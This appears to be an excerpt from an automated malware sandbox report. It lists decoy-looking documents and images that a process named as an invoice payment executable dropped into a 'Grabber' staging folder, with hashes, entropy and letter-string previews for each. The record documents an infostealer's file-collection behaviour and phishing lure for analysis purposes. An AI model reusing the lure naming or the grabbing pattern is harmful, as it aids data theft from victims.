MD5:	A2EF8D31A8DC8EAFB642142CAE0BDDE5
SHA1:	6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
SHA-256:	A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
SHA-512:	0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
Malicious:	false
Preview:	ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\UMMBDNEQBN.png

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ.jpg

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ.xlsx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\XZXHAVGRAG.xlsx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\XZXHAVGRAG\DVWHKMNFNN.jpg

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\XZXHAVGRAG\KATAXZVCPS.pdf

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\XZXHAVGRAG\NWTVCDUMOB.png

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\XZXHAVGRAG\VLZDGUKUTZ.xlsx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\XZXHAVGRAG\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
